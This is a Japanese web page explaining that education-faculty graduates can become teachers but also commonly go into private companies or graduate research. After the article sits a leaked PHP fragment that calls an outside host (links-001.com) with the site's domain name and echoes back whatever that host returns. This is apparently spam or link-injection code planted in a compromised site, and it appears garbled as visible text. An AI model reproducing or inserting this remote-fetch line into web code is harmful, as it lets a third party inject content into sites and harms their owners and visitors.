前へ
次へ

大学の教育学部を卒業した後の進路

大学の教育学部を卒業した後の進路として、まず真っ先に思い起こされるのが学校の教員になる道でしょう。
確かに、最初から教員になりたいと思って教育学部に入学する学生は多く、実際に在学中に教員免許を取得することもできるため、教員になる卒業生は多数を占めます。
とは言え、教育学部を卒業後に目指せる進路は、何も教員だけに限りません。
そもそも、教育学部で学べる内容は非常に多岐に渡っており、子供の教育や家庭を巡る様々な事象について、社会学や心理学などいろんな角度からアプローチしていきます。
すなわち、教育学部とは単なる教員の養成過程ではないのです。
そのため、他学部の学生と同様に民間企業への就職活動を行うことも普通ですし、特定の研究テーマに深く興味があれば研究者として大学院に進む方も珍しくありません。
ですので、教員になりたいという明確な目標がない学生でも、教育学に少しでも興味があれば、進学先として教育学部が候補に挙がります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top